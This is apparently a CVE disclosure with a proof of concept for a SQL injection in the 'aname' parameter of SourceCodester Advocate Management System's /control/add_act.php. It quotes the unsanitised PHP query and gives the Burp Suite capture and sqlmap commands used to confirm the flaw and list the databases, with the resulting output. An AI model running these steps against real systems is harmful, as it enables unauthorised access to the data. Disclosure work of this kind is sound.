CVE-2024-6729
Details
Attack type: SQL injection
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Vendor: SourceCodester
Product: Advocate Management System
Affected components: /control/add_act.php
Injection parameter: MULTIPART aname
POC
The add_acts.php
file adds the use input directly into the SQL query, without any parameterizaztion.
$aname = $_POST['aname'];
:
: <SNIP>
:
$sql = "INSERT INTO legel_acts(act_name,status) VALUES ('$aname','1')";
Intercept request using Burpsuite Proxy.
Save the request to control.add_act.txt
.
The vulnerability can be verified with the following command:
sqlmap -r control.add_act.txt --batch
Parameter: MULTIPART aname ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -----------------------------8879615583215427378340903645
Content-Disposition: form-data; name="aname"
The databases can be dumped with the following command:
sqlmap -r control.add_act.txt --batch --dbs
[04:20:26] [INFO] fetching database names
[04:20:26] [INFO] resumed: 'information_schema'
[04:20:26] [INFO] resumed: 'kortex_lite'
available databases [2]:
[*] information_schema
[*] kortex_lite